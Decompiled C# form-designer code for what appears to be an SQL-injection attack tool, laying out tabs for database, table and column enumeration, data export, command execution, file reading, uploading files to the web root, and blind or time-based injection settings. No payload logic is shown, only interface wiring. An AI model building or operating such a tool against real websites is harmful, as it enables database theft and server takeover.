			//IL_172f: Unknown result type (might be due to invalid IL or missing references)
			//IL_1756: Unknown result type (might be due to invalid IL or missing references)
			//IL_1760: Expected O, but got Unknown
			//IL_1766: Unknown result type (might be due to invalid IL or missing references)
			//IL_178a: Unknown result type (might be due to invalid IL or missing references)
			//IL_17d4: Unknown result type (might be due to invalid IL or missing references)
			//IL_17fb: Unknown result type (might be due to invalid IL or missing references)
			//IL_1805: Expected O, but got Unknown
			//IL_180b: Unknown result type (might be due to invalid IL or missing references)
			//IL_182f: Unknown result type (might be due to invalid IL or missing references)
			//IL_1879: Unknown result type (might be due to invalid IL or missing references)
			//IL_18de: Unknown result type (might be due to invalid IL or missing references)
			//IL_1908: Unknown result type (might be due to invalid IL or missing references)
			//IL_1968: Unknown result type (might be due to invalid IL or missing references)
			//IL_1992: Unknown result type (might be due to invalid IL or missing references)
			//IL_19ae: Unknown result type (might be due to invalid IL or missing references)
			//IL_1a1e: Unknown result type (might be due to invalid IL or missing references)
			//IL_1a45: Unknown result type (might be due to invalid IL or missing references)
			//IL_1a84: Unknown result type (might be due to invalid IL or missing references)
			//IL_1aab: Unknown result type (might be due to invalid IL or missing references)
			//IL_1ae2: Unknown result type (might be due to invalid IL or missing references)
			//IL_1aec: Expected O, but got Unknown
			//IL_1af2: Unknown result type (might be due to invalid IL or missing references)
			//IL_1b16: Unknown result type (might be due to invalid IL or missing references)
			//IL_1b60: Unknown result type (might be due to invalid IL or missing references)
			//IL_1b70: Unknown result type (might be due to invalid IL or missing references)
			//IL_1bd0: Unknown result type (might be due to invalid IL or missing references)
			//IL_1bf7: Unknown result type (might be due to invalid IL or missing references)
			//IL_1c36: Unknown result type (might be due to invalid IL or missing references)
			//IL_1c5d: Unknown result type (might be due to invalid IL or missing references)
			//IL_1c94: Unknown result type (might be due to invalid IL or missing references)
			//IL_1c9e: Expected O, but got Unknown
			//IL_1ca4: Unknown result type (might be due to invalid IL or missing references)
			//IL_1cc8: Unknown result type (might be due to invalid IL or missing references)
			//IL_1d12: Unknown result type (might be due to invalid IL or missing references)
			//IL_1d61: Unknown result type (might be due to invalid IL or missing references)
			//IL_1d8b: Unknown result type (might be due to invalid IL or missing references)
			//IL_1dd2: Unknown result type (might be due to invalid IL or missing references)
			//IL_1e14: Unknown result type (might be due to invalid IL or missing references)
			//IL_1e30: Unknown result type (might be due to invalid IL or missing references)
			//IL_1e90: Unknown result type (might be due to invalid IL or missing references)
			//IL_1eb7: Unknown result type (might be due to invalid IL or missing references)
			//IL_1ef7: Unknown result type (might be due to invalid IL or missing references)
			//IL_1f2e: Unknown result type (might be due to invalid IL or missing references)
			//IL_1f65: Unknown result type (might be due to invalid IL or missing references)
			//IL_1f6f: Expected O, but got Unknown
			//IL_1f75: Unknown result type (might be due to invalid IL or missing references)
			//IL_1f99: Unknown result type (might be due to invalid IL or missing references)
			//IL_1fe3: Unknown result type (might be due to invalid IL or missing references)
			//IL_20a0: Unknown result type (might be due to invalid IL or missing references)
			//IL_20ca: Unknown result type (might be due to invalid IL or missing references)
			//IL_2109: Unknown result type (might be due to invalid IL or missing references)
			//IL_212d: Unknown result type (might be due to invalid IL or missing references)
			//IL_218c: Unknown result type (might be due to invalid IL or missing references)
			//IL_21b0: Unknown result type (might be due to invalid IL or missing references)
			//IL_21e0: Unknown result type (might be due to invalid IL or missing references)
			//IL_2207: Unknown result type (might be due to invalid IL or missing references)
			//IL_2232: Unknown result type (might be due to invalid IL or missing references)
			//IL_2256: Unknown result type (might be due to invalid IL or missing references)
			//IL_2289: Unknown result type (might be due to invalid IL or missing references)
			//IL_22ad: Unknown result type (might be due to invalid IL or missing references)
			//IL_22ff: Unknown result type (might be due to invalid IL or missing references)
			//IL_2323: Unknown result type (might be due to invalid IL or missing references)
			//IL_2376: Unknown result type (might be due to invalid IL or missing references)
			//IL_239d: Unknown result type (might be due to invalid IL or missing references)
			//IL_247c: Unknown result type (might be due to invalid IL or missing references)
			//IL_24a6: Unknown result type (might be due to invalid IL or missing references)
			//IL_24e8: Unknown result type (might be due to invalid IL or missing references)
			//IL_250c: Unknown result type (might be due to invalid IL or missing references)
			//IL_256b: Unknown result type (might be due to invalid IL or missing references)
			//IL_2592: Unknown result type (might be due to invalid IL or missing references)
			//IL_25ce: Unknown result type (might be due to invalid IL or missing references)
			//IL_25f5: Unknown result type (might be due to invalid IL or missing references)
			//IL_2628: Unknown result type (might be due to invalid IL or missing references)
			//IL_264c: Unknown result type (might be due to invalid IL or missing references)
			//IL_269f: Unknown result type (might be due to invalid IL or missing references)
			//IL_26c6: Unknown result type (might be due to invalid IL or missing references)
			//IL_26e6: Unknown result type (might be due to invalid IL or missing references)
			//IL_270d: Unknown result type (might be due to invalid IL or missing references)
			//IL_2739: Unknown result type (might be due to invalid IL or missing references)
			//IL_275d: Unknown result type (might be due to invalid IL or missing references)
			//IL_2799: Unknown result type (might be due to invalid IL or missing references)
			//IL_27bd: Unknown result type (might be due to invalid IL or missing references)
			//IL_2812: Unknown result type (might be due to invalid IL or missing references)
			//IL_283c: Unknown result type (might be due to invalid IL or missing references)
			//IL_2b21: Unknown result type (might be due to invalid IL or missing references)
			//IL_2b4b: Unknown result type (might be due to invalid IL or missing references)
			//IL_2b99: Unknown result type (might be due to invalid IL or missing references)
			//IL_2bc0: Unknown result type (might be due to invalid IL or missing references)
			//IL_2c00: Unknown result type (might be due to invalid IL or missing references)
			//IL_2c24: Unknown result type (might be due to invalid IL or missing references)
			//IL_2c7f: Unknown result type (might be due to invalid IL or missing references)
			//IL_2ca6: Unknown result type (might be due to invalid IL or missing references)
			//IL_2ce9: Unknown result type (might be due to invalid IL or missing references)
			//IL_2d10: Unknown result type (might be due to invalid IL or missing references)
			//IL_2d50: Unknown result type (might be due to invalid IL or missing references)
			//IL_2d74: Unknown result type (might be due to invalid IL or missing references)
			//IL_2dfe: Unknown result type (might be due to invalid IL or missing references)
			//IL_2e22: Unknown result type (might be due to invalid IL or missing references)
			//IL_2e52: Unknown result type (might be due to invalid IL or missing references)
			//IL_2e76: Unknown result type (might be due to invalid IL or missing references)
			//IL_2f00: Unknown result type (might be due to invalid IL or missing references)
			//IL_2f24: Unknown result type (might be due to invalid IL or missing references)
			//IL_2f57: Unknown result type (might be due to invalid IL or missing references)
			//IL_2f7e: Unknown result type (might be due to invalid IL or missing references)
			//IL_2fb5: Unknown result type (might be due to invalid IL or missing references)
			//IL_2fd9: Unknown result type (might be due to invalid IL or missing references)
			//IL_3009: Unknown result type (might be due to invalid IL or missing references)
			//IL_302d: Unknown result type (might be due to invalid IL or missing references)
			//IL_3070: Unknown result type (might be due to invalid IL or missing references)
			//IL_3097: Unknown result type (might be due to invalid IL or missing references)
			//IL_30da: Unknown result type (might be due to invalid IL or missing references)
			//IL_3101: Unknown result type (might be due to invalid IL or missing references)
			//IL_3141: Unknown result type (might be due to invalid IL or missing references)
			//IL_3165: Unknown result type (might be due to invalid IL or missing references)
			//IL_31bd: Unknown result type (might be due to invalid IL or missing references)
			//IL_31e1: Unknown result type (might be due to invalid IL or missing references)
			//IL_3221: Unknown result type (might be due to invalid IL or missing references)
			//IL_3245: Unknown result type (might be due to invalid IL or missing references)
			//IL_3288: Unknown result type (might be due to invalid IL or missing references)
			//IL_32af: Unknown result type (might be due to invalid IL or missing references)
			//IL_32ef: Unknown result type (might be due to invalid IL or missing references)
			//IL_3316: Unknown result type (might be due to invalid IL or missing references)
			//IL_3356: Unknown result type (might be due to invalid IL or missing references)
			//IL_337d: Unknown result type (might be due to invalid IL or missing references)
			//IL_33c0: Unknown result type (might be due to invalid IL or missing references)
			//IL_33e7: Unknown result type (might be due to invalid IL or missing references)
			//IL_341b: Unknown result type (might be due to invalid IL or missing references)
			//IL_343f: Unknown result type (might be due to invalid IL or missing references)
			//IL_346f: Unknown result type (might be due to invalid IL or missing references)
			//IL_3496: Unknown result type (might be due to invalid IL or missing references)
			//IL_34d9: Unknown result type (might be due to invalid IL or missing references)
			//IL_34fd: Unknown result type (might be due to invalid IL or missing references)
			//IL_3553: Unknown result type (might be due to invalid IL or missing references)
			//IL_3577: Unknown result type (might be due to invalid IL or missing references)
			//IL_35d6: Unknown result type (might be due to invalid IL or missing references)
			//IL_35fd: Unknown result type (might be due to invalid IL or missing references)
			//IL_3630: Unknown result type (might be due to invalid IL or missing references)
			//IL_3654: Unknown result type (might be due to invalid IL or missing references)
			//IL_3680: Unknown result type (might be due to invalid IL or missing references)
			//IL_36a4: Unknown result type (might be due to invalid IL or missing references)
			//IL_36d7: Unknown result type (might be due to invalid IL or missing references)
			//IL_36fb: Unknown result type (might be due to invalid IL or missing references)
			//IL_372a: Unknown result type (might be due to invalid IL or missing references)
			//IL_374e: Unknown result type (might be due to invalid IL or missing references)
			//IL_37a2: Unknown result type (might be due to invalid IL or missing references)
			//IL_37c6: Unknown result type (might be due to invalid IL or missing references)
			//IL_381a: Unknown result type (might be due to invalid IL or missing references)
			//IL_383e: Unknown result type (might be due to invalid IL or missing references)
			//IL_3882: Unknown result type (might be due to invalid IL or missing references)
			//IL_392b: Unknown result type (might be due to invalid IL or missing references)
			//IL_3952: Unknown result type (might be due to invalid IL or missing references)
			//IL_3992: Unknown result type (might be due to invalid IL or missing references)
			//IL_3a3e: Unknown result type (might be due to invalid IL or missing references)
			//IL_3a78: Unknown result type (might be due to invalid IL or missing references)
			//IL_3a9c: Unknown result type (might be due to invalid IL or missing references)
			//IL_3ad3: Unknown result type (might be due to invalid IL or missing references)
			//IL_3af6: Unknown result type (might be due to invalid IL or missing references)
			//IL_3b1a: Unknown result type (might be due to invalid IL or missing references)
			//IL_3b98: Unknown result type (might be due to invalid IL or missing references)
			//IL_3bd2: Unknown result type (might be due to invalid IL or missing references)
			//IL_3bf9: Unknown result type (might be due to invalid IL or missing references)
			//IL_3c03: Expected O, but got Unknown
			//IL_3c09: Unknown result type (might be due to invalid IL or missing references)
			//IL_3c2d: Unknown result type (might be due to invalid IL or missing references)
			//IL_3c77: Unknown result type (might be due to invalid IL or missing references)
			//IL_3c8c: Unknown result type (might be due to invalid IL or missing references)
			//IL_3ca8: Unknown result type (might be due to invalid IL or missing references)
			components = (IContainer)new Container();
			ComponentResourceManager val = new ComponentResourceManager(typeof(FormSQL));
			tabSQLInjection = new TabControl();
			tabEnv = new TabPage();
			listViewEnv = new ListView();
			columnHeader1 = new ColumnHeader();
			columnHeader2 = new ColumnHeader();
			toolStripEnv = new ToolStrip();
			toolStripSeparator11 = new ToolStripSeparator();
			btnGetInfo = new ToolStripButton();
			toolStripSeparator12 = new ToolStripSeparator();
			btnReset = new ToolStripButton();
			tabDatabase = new TabPage();
			splitDB = new SplitContainer();
			treeViewDB = new TreeView();
			WCRImageList = new ImageList(components);
			toolStripDB = new ToolStrip();
			cmbChkAllDB = new ToolStripComboBox();
			toolStripSeparator8 = new ToolStripSeparator();
			btnGetDB = new ToolStripButton();
			toolStripSeparator4 = new ToolStripSeparator();
			btnGetTable = new ToolStripButton();
			toolStripSeparator5 = new ToolStripSeparator();
			btnGetColumn = new ToolStripButton();
			toolStripSeparator6 = new ToolStripSeparator();
			btnImpDB = new ToolStripButton();
			toolStripSeparator17 = new ToolStripSeparator();
			btnExpDB = new ToolStripButton();
			toolStripSeparator19 = new ToolStripSeparator();
			listViewData = new ListView();
			toolStripData = new ToolStrip();
			toolStripLabel4 = new ToolStripLabel();
			txtRowsBegin = new ToolStripTextBox();
			toolStripLabel5 = new ToolStripLabel();
			txtRowsEnd = new ToolStripTextBox();
			toolStripSeparator7 = new ToolStripSeparator();
			btnGetData = new ToolStripButton();
			toolStripSeparator9 = new ToolStripSeparator();
			btnExpData = new ToolStripButton();
			toolStripSeparator18 = new ToolStripSeparator();
			tabCMD = new TabPage();
			listBoxCMD = new ListBox();
			toolStripDBCMD = new ToolStrip();
			toolStripSeparator15 = new ToolStripSeparator();
			txtDBCMD = new ToolStripTextBox();
			btnDBCMD = new ToolStripButton();
			toolStripSeparator16 = new ToolStripSeparator();
			toolStripCommand = new ToolStrip();
			toolStripSeparator13 = new ToolStripSeparator();
			txtCMD = new ToolStripTextBox();
			btnCMD = new ToolStripButton();
			toolStripSeparator14 = new ToolStripSeparator();
			tabFileReader = new TabPage();
			txtFileContent = new TextBox();
			toolFileReader = new ToolStrip();
			toolStripLabel6 = new ToolStripLabel();
			txtFileName = new ToolStripTextBox();
			btnReadFile = new ToolStripButton();
			toolStripSeparator10 = new ToolStripSeparator();
			tabFileUploader = new TabPage();
			btnGetWebRoot = new Button();
			label3 = new Label();
			txtTargetFileName = new TextBox();
			label2 = new Label();
			btnSelectFile = new Button();
			btnFileUpload = new Button();
			txtUploadFile = new TextBox();
			tabEscapeString = new TabPage();
			btnDecode = new Button();
			label17 = new Label();
			label16 = new Label();
			btnEncode = new Button();
			txtEscapeString = new TextBox();
			txtSourceString = new TextBox();
			label6 = new Label();
			label5 = new Label();
			tabDebug = new TabPage();
			grpInjectMethod = new GroupBox();
			label23 = new Label();
			radioTime = new RadioButton();
			label20 = new Label();
			label21 = new Label();
			label22 = new Label();
			ComboBoxWebEncoding = new ComboBox();
			label19 = new Label();
			ComboBoxDBEncoding = new ComboBox();
			label18 = new Label();
			txtComment = new TextBox();
			lblComment = new Label();
			label4 = new Label();
			label1 = new Label();
			radioCrossSite = new RadioButton();
			label15 = new Label();
			label14 = new Label();
			label13 = new Label();
			label12 = new Label();
			label11 = new Label();
			label10 = new Label();
			txtWildField = new TextBox();
			label9 = new Label();
			btnSetEnv = new Button();
			btnGetEnv = new Button();
			label8 = new Label();
			txtInjectField = new TextBox();
			label7 = new Label();
			txtFieldNum = new TextBox();
			radioBlind = new RadioButton();
			radioFieldEcho = new RadioButton();
			radioPlainText = new RadioButton();
			toolStripSQL = new ToolStrip();
			toolStripLabel1 = new ToolStripLabel();
			cmbDBTypeList = new ToolStripComboBox();
			toolStripSeparator1 = new ToolStripSeparator();
			toolStripLabel2 = new ToolStripLabel();
			txtKeyWord = new ToolStripTextBox();
			toolStripSeparator2 = new ToolStripSeparator();
			toolStripLabel3 = new ToolStripLabel();
			cmbParameterType = new ToolStripComboBox();
			toolStripSeparator3 = new ToolStripSeparator();
			ButtonResetSQL = new ToolStripButton();
			toolStripSeparator20 = new ToolStripSeparator();
			((Control)tabSQLInjection).SuspendLayout();
			((Control)tabEnv).SuspendLayout();
			((Control)toolStripEnv).SuspendLayout();
			((Control)tabDatabase).SuspendLayout();
			((Control)splitDB.get_Panel1()).SuspendLayout();
			((Control)splitDB.get_Panel2()).SuspendLayout();
			((Control)splitDB).SuspendLayout();
			((Control)toolStripDB).SuspendLayout();
			((Control)toolStripData).SuspendLayout();
			((Control)tabCMD).SuspendLayout();
			((Control)toolStripDBCMD).SuspendLayout();
			((Control)toolStripCommand).SuspendLayout();
			((Control)tabFileReader).SuspendLayout();
			((Control)toolFileReader).SuspendLayout();
			((Control)tabFileUploader).SuspendLayout();
			((Control)tabEscapeString).SuspendLayout();
			((Control)tabDebug).SuspendLayout();
			((Control)grpInjectMethod).SuspendLayout();
			((Control)toolStripSQL).SuspendLayout();
			((Control)this).SuspendLayout();
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabEnv);
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabDatabase);
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabCMD);
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabFileReader);
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabFileUploader);
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabEscapeString);
			((Control)tabSQLInjection).get_Controls().Add((Control)(object)tabDebug);
			((Control)tabSQLInjection).set_Dock((DockStyle)5);
			tabSQLInjection.set_ImageList(WCRImageList);
			((Control)tabSQLInjection).set_Location(new Point(0, 25));
			((Control)tabSQLInjection).set_Name("tabSQLInjection");
			tabSQLInjection.set_SelectedIndex(0);
			((Control)tabSQLInjection).set_Size(new Size(685, 445));
			((Control)tabSQLInjection).set_TabIndex(0);
			((Control)tabEnv).get_Controls().Add((Control)(object)listViewEnv);
			((Control)tabEnv).get_Controls().Add((Control)(object)toolStripEnv);
			tabEnv.set_ImageKey("env.png");
			tabEnv.set_Location(new Point(4, 23));
			((Control)tabEnv).set_Name("tabEnv");
			((Control)tabEnv).set_Padding(new Padding(3));
			((Control)tabEnv).set_Size(new Size(677, 418));
			tabEnv.set_TabIndex(0);
			((Control)tabEnv).set_Text("Environment");
			tabEnv.set_UseVisualStyleBackColor(true);
			listViewEnv.set_CheckBoxes(true);
			listViewEnv.get_Columns().AddRange((ColumnHeader[])(object)new ColumnHeader[2]
			{
				columnHeader1,
				columnHeader2
			});
			((Control)listViewEnv).set_Dock((DockStyle)5);
			listViewEnv.set_FullRowSelect(true);
			((Control)listViewEnv).set_Location(new Point(3, 3));
			listViewEnv.set_MultiSelect(false);
			((Control)listViewEnv).set_Name("listViewEnv");
			((Control)listViewEnv).set_Size(new Size(671, 387));
			((Control)listViewEnv).set_TabIndex(14);
			listViewEnv.set_UseCompatibleStateImageBehavior(false);
			listViewEnv.set_View((View)1);
			((Control)listViewEnv).add_MouseClick(new MouseEventHandler(listViewEnv_MouseClick));
			columnHeader1.set_Text("Environment");
			columnHeader1.set_Width(194);
			columnHeader2.set_Text("Value");
			columnHeader2.set_Width(480);
			toolStripEnv.set_BackColor(SystemColors.get_ButtonFace());
			((Control)toolStripEnv).set_Dock((DockStyle)2);
			toolStripEnv.set_GripStyle((ToolStripGripStyle)0);
			toolStripEnv.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[4]
			{
				(ToolStripItem)toolStripSeparator11,
				(ToolStripItem)btnGetInfo,
				(ToolStripItem)toolStripSeparator12,
				(ToolStripItem)btnReset
			});
			((Control)toolStripEnv).set_Location(new Point(3, 390));
			((Control)toolStripEnv).set_Name("toolStripEnv");
			((Control)toolStripEnv).set_Size(new Size(671, 25));
			((Control)toolStripEnv).set_TabIndex(13);
			((Control)toolStripEnv).set_Text("toolStrip1");
			((ToolStripItem)toolStripSeparator11).set_Name("toolStripSeparator11");
			((ToolStripItem)toolStripSeparator11).set_Size(new Size(6, 25));
			((ToolStripItem)btnGetInfo).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnGetInfo).set_Image((Image)((ResourceManager)(object)val).GetObject("btnGetInfo.Image"));
			((ToolStripItem)btnGetInfo).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnGetInfo).set_Name("btnGetInfo");
			((ToolStripItem)btnGetInfo).set_Size(new Size(175, 22));
			((ToolStripItem)btnGetInfo).set_Text("Get Environment Infomation");
			((ToolStripItem)btnGetInfo).add_Click((EventHandler)btnGetInfo_Click);
			((ToolStripItem)toolStripSeparator12).set_Name("toolStripSeparator12");
			((ToolStripItem)toolStripSeparator12).set_Size(new Size(6, 25));
			((ToolStripItem)btnReset).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnReset).set_Image((Image)((ResourceManager)(object)val).GetObject("btnReset.Image"));
			((ToolStripItem)btnReset).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnReset).set_Name("btnReset");
			((ToolStripItem)btnReset).set_Size(new Size(44, 22));
			((ToolStripItem)btnReset).set_Text("Reset");
			((ToolStripItem)btnReset).add_Click((EventHandler)btnReset_Click);
			((Control)tabDatabase).get_Controls().Add((Control)(object)splitDB);
			tabDatabase.set_ImageKey("db.png");
			tabDatabase.set_Location(new Point(4, 23));
			((Control)tabDatabase).set_Name("tabDatabase");
			((Control)tabDatabase).set_Padding(new Padding(3));
			((Control)tabDatabase).set_Size(new Size(677, 418));
			tabDatabase.set_TabIndex(1);
			((Control)tabDatabase).set_Text("DataBase");
			tabDatabase.set_UseVisualStyleBackColor(true);
			splitDB.set_Dock((DockStyle)5);
			((Control)splitDB).set_Location(new Point(3, 3));
			((Control)splitDB).set_Name("splitDB");
			((Control)splitDB.get_Panel1()).get_Controls().Add((Control)(object)treeViewDB);
			((Control)splitDB.get_Panel1()).get_Controls().Add((Control)(object)toolStripDB);
			((Control)splitDB.get_Panel2()).get_Controls().Add((Control)(object)listViewData);
			((Control)splitDB.get_Panel2()).get_Controls().Add((Control)(object)toolStripData);
			((Control)splitDB).set_Size(new Size(671, 412));
			splitDB.set_SplitterDistance(341);
			((Control)splitDB).set_TabIndex(0);
			treeViewDB.set_CheckBoxes(true);
			((Control)treeViewDB).set_Dock((DockStyle)5);
			((Control)treeViewDB).set_Font(new Font("Arial", 10.5f, (FontStyle)0, (GraphicsUnit)3, (byte)0));
			treeViewDB.set_FullRowSelect(true);
			treeViewDB.set_ImageIndex(0);
			treeViewDB.set_ImageList(WCRImageList);
			treeViewDB.set_Indent(40);
			treeViewDB.set_LabelEdit(true);
			((Control)treeViewDB).set_Location(new Point(0, 0));
			((Control)treeViewDB).set_Margin(new Padding(3, 4, 3, 4));
			((Control)treeViewDB).set_Name("treeViewDB");
			treeViewDB.set_SelectedImageIndex(0);
			((Control)treeViewDB).set_Size(new Size(341, 387));
			((Control)treeViewDB).set_TabIndex(2);
			treeViewDB.add_BeforeCheck(new TreeViewCancelEventHandler(treeViewDB_BeforeCheck));
			treeViewDB.add_AfterCheck(new TreeViewEventHandler(treeViewDB_AfterCheck));
			treeViewDB.add_NodeMouseClick(new TreeNodeMouseClickEventHandler(treeViewDB_NodeMouseClick));
			((Control)treeViewDB).add_MouseDown(new MouseEventHandler(treeViewDB_MouseDown));
			WCRImageList.set_ImageStream((ImageListStreamer)((ResourceManager)(object)val).GetObject("WCRImageList.ImageStream"));
			WCRImageList.set_TransparentColor(Color.get_Transparent());
			WCRImageList.get_Images().SetKeyName(0, "select.png");
			WCRImageList.get_Images().SetKeyName(1, "ie.png");
			WCRImageList.get_Images().SetKeyName(2, "scan.png");
			WCRImageList.get_Images().SetKeyName(3, "env.png");
			WCRImageList.get_Images().SetKeyName(4, "db.png");
			WCRImageList.get_Images().SetKeyName(5, "cmd.png");
			WCRImageList.get_Images().SetKeyName(6, "admin.png");
			WCRImageList.get_Images().SetKeyName(7, "file.png");
			WCRImageList.get_Images().SetKeyName(8, "xss.png");
			WCRImageList.get_Images().SetKeyName(9, "tool.png");
			WCRImageList.get_Images().SetKeyName(10, "code.png");
			WCRImageList.get_Images().SetKeyName(11, "about.png");
			WCRImageList.get_Images().SetKeyName(12, "go.png");
			WCRImageList.get_Images().SetKeyName(13, "start.png");
			WCRImageList.get_Images().SetKeyName(14, "pause.png");
			WCRImageList.get_Images().SetKeyName(15, "stop.png");
			WCRImageList.get_Images().SetKeyName(16, "table.png");
			WCRImageList.get_Images().SetKeyName(17, "column.png");
			WCRImageList.get_Images().SetKeyName(18, "vul.png");
			WCRImageList.get_Images().SetKeyName(19, "upload.png");
			WCRImageList.get_Images().SetKeyName(20, "report.png");
			WCRImageList.get_Images().SetKeyName(21, "escape.png");
			toolStripDB.set_BackColor(SystemColors.get_ButtonFace());
			((Control)toolStripDB).set_Dock((DockStyle)2);
			toolStripDB.set_GripStyle((ToolStripGripStyle)0);
			toolStripDB.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[12]
			{
				(ToolStripItem)cmbChkAllDB,
				(ToolStripItem)toolStripSeparator8,
				(ToolStripItem)btnGetDB,
				(ToolStripItem)toolStripSeparator4,
				(ToolStripItem)btnGetTable,
				(ToolStripItem)toolStripSeparator5,
				(ToolStripItem)btnGetColumn,
				(ToolStripItem)toolStripSeparator6,
				(ToolStripItem)btnImpDB,
				(ToolStripItem)toolStripSeparator17,
				(ToolStripItem)btnExpDB,
				(ToolStripItem)toolStripSeparator19
			});
			((Control)toolStripDB).set_Location(new Point(0, 387));
			((Control)toolStripDB).set_Name("toolStripDB");
			((Control)toolStripDB).set_Size(new Size(341, 25));
			((Control)toolStripDB).set_TabIndex(0);
			((Control)toolStripDB).set_Text("toolStrip1");
			cmbChkAllDB.set_DropDownStyle((ComboBoxStyle)2);
			cmbChkAllDB.get_Items().AddRange(new object[2]
			{
				"Get_Current_DB_Only",
				"Get_All_DB"
			});
			((ToolStripItem)cmbChkAllDB).set_Name("cmbChkAllDB");
			((ToolStripItem)cmbChkAllDB).set_Size(new Size(130, 25));
			((ToolStripItem)toolStripSeparator8).set_Name("toolStripSeparator8");
			((ToolStripItem)toolStripSeparator8).set_Size(new Size(6, 25));
			((ToolStripItem)btnGetDB).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnGetDB).set_Image((Image)((ResourceManager)(object)val).GetObject("btnGetDB.Image"));
			((ToolStripItem)btnGetDB).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnGetDB).set_Name("btnGetDB");
			((ToolStripItem)btnGetDB).set_Size(new Size(67, 22));
			((ToolStripItem)btnGetDB).set_Text("DataBase");
			((ToolStripItem)btnGetDB).add_Click((EventHandler)btnGetDB_Click);
			((ToolStripItem)toolStripSeparator4).set_Name("toolStripSeparator4");
			((ToolStripItem)toolStripSeparator4).set_Size(new Size(6, 25));
			((ToolStripItem)btnGetTable).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnGetTable).set_Image((Image)((ResourceManager)(object)val).GetObject("btnGetTable.Image"));
			((ToolStripItem)btnGetTable).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnGetTable).set_Name("btnGetTable");
			((ToolStripItem)btnGetTable).set_Size(new Size(44, 22));
			((ToolStripItem)btnGetTable).set_Text("Table");
			((ToolStripItem)btnGetTable).add_Click((EventHandler)btnGetTable_Click);
			((ToolStripItem)toolStripSeparator5).set_Name("toolStripSeparator5");
			((ToolStripItem)toolStripSeparator5).set_Size(new Size(6, 25));
			((ToolStripItem)btnGetColumn).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnGetColumn).set_Image((Image)((ResourceManager)(object)val).GetObject("btnGetColumn.Image"));
			((ToolStripItem)btnGetColumn).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnGetColumn).set_Name("btnGetColumn");
			((ToolStripItem)btnGetColumn).set_Size(new Size(56, 22));
			((ToolStripItem)btnGetColumn).set_Text("Column");
			((ToolStripItem)btnGetColumn).add_Click((EventHandler)btnGetColumn_Click);
			((ToolStripItem)toolStripSeparator6).set_Name("toolStripSeparator6");
			((ToolStripItem)toolStripSeparator6).set_Size(new Size(6, 25));
			((ToolStripItem)btnImpDB).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnImpDB).set_Image((Image)((ResourceManager)(object)val).GetObject("btnImpDB.Image"));
			((ToolStripItem)btnImpDB).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnImpDB).set_Name("btnImpDB");
			((ToolStripItem)btnImpDB).set_Size(new Size(52, 21));
			((ToolStripItem)btnImpDB).set_Text("Import");
			((ToolStripItem)btnImpDB).add_Click((EventHandler)btnImpDB_Click);
			((ToolStripItem)toolStripSeparator17).set_Name("toolStripSeparator17");
			((ToolStripItem)toolStripSeparator17).set_Size(new Size(6, 25));
			((ToolStripItem)btnExpDB).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnExpDB).set_Image((Image)((ResourceManager)(object)val).GetObject("btnExpDB.Image"));
			((ToolStripItem)btnExpDB).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnExpDB).set_Name("btnExpDB");
			((ToolStripItem)btnExpDB).set_Size(new Size(50, 21));
			((ToolStripItem)btnExpDB).set_Text("Export");
			((ToolStripItem)btnExpDB).add_Click((EventHandler)btnExpDB_Click);
			((ToolStripItem)toolStripSeparator19).set_Name("toolStripSeparator19");
			((ToolStripItem)toolStripSeparator19).set_Size(new Size(6, 25));
			listViewData.set_AllowColumnReorder(true);
			((Control)listViewData).set_Dock((DockStyle)5);
			listViewData.set_FullRowSelect(true);
			((Control)listViewData).set_Location(new Point(0, 0));
			((Control)listViewData).set_Margin(new Padding(3, 4, 3, 4));
			((Control)listViewData).set_Name("listViewData");
			((Control)listViewData).set_Size(new Size(326, 387));
			((Control)listViewData).set_TabIndex(8);
			listViewData.set_UseCompatibleStateImageBehavior(false);
			listViewData.set_View((View)1);
			((Control)listViewData).add_MouseClick(new MouseEventHandler(listViewData_MouseClick));
			toolStripData.set_BackColor(SystemColors.get_ButtonFace());
			((Control)toolStripData).set_Dock((DockStyle)2);
			toolStripData.set_GripStyle((ToolStripGripStyle)0);
			toolStripData.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[9]
			{
				(ToolStripItem)toolStripLabel4,
				(ToolStripItem)txtRowsBegin,
				(ToolStripItem)toolStripLabel5,
				(ToolStripItem)txtRowsEnd,
				(ToolStripItem)toolStripSeparator7,
				(ToolStripItem)btnGetData,
				(ToolStripItem)toolStripSeparator9,
				(ToolStripItem)btnExpData,
				(ToolStripItem)toolStripSeparator18
			});
			((Control)toolStripData).set_Location(new Point(0, 387));
			((Control)toolStripData).set_Name("toolStripData");
			((Control)toolStripData).set_Size(new Size(326, 25));
			((Control)toolStripData).set_TabIndex(7);
			((Control)toolStripData).set_Text("toolStrip1");
			((ToolStripItem)toolStripLabel4).set_Name("toolStripLabel4");
			((ToolStripItem)toolStripLabel4).set_Size(new Size(73, 22));
			((ToolStripItem)toolStripLabel4).set_Text("Rows From");
			((ToolStripItem)txtRowsBegin).set_Name("txtRowsBegin");
			((ToolStripItem)txtRowsBegin).set_Size(new Size(35, 25));
			((ToolStripItem)txtRowsBegin).set_Text("1");
			((ToolStripItem)txtRowsBegin).set_ToolTipText("Rows Begin( >=1)");
			((ToolStripItem)toolStripLabel5).set_Name("toolStripLabel5");
			((ToolStripItem)toolStripLabel5).set_Size(new Size(23, 22));
